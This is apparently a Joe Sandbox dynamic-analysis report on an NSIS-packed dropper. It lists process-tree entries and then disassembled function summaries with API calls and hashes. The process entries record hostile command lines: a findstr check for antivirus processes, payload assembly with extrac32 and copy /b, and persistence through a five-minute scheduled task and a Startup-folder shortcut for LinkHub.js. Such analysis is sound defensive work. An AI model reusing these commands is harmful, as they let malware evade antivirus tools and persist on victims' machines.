Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:33:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 361684
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:33:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Approaches
Imagebase:	0xe70000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:33:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Korea" Measurement
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:33:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	16:33:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	16:33:18
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Wow64 process (32bit):	true
Commandline:	Propose.com U
Imagebase:	0xdb0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	16:33:18
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x540000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:33:18
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:33:18
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	16:33:18
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Imagebase:	0xea0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	16:33:19
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:33:19
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:33:20
Start date:	07/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Imagebase:	0x7ff6378e0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:33:20
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Imagebase:	0xb00000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:33:28
Start date:	07/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Imagebase:	0x7ff6378e0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	16:33:28
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Imagebase:	0xb00000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182
{, xrefs: 00405352

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

\Temp, xrefs: 00403A1B
/D=, xrefs: 004039A6
~nsu.tmp, xrefs: 00403AF7
NCRC, xrefs: 0040397C
NSIS Error, xrefs: 004038E2
_?=, xrefs: 00403A64
Error launching installer, xrefs: 00403A7D
1C, xrefs: 00403B56
SeShutdownPrivilege, xrefs: 00403C16

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
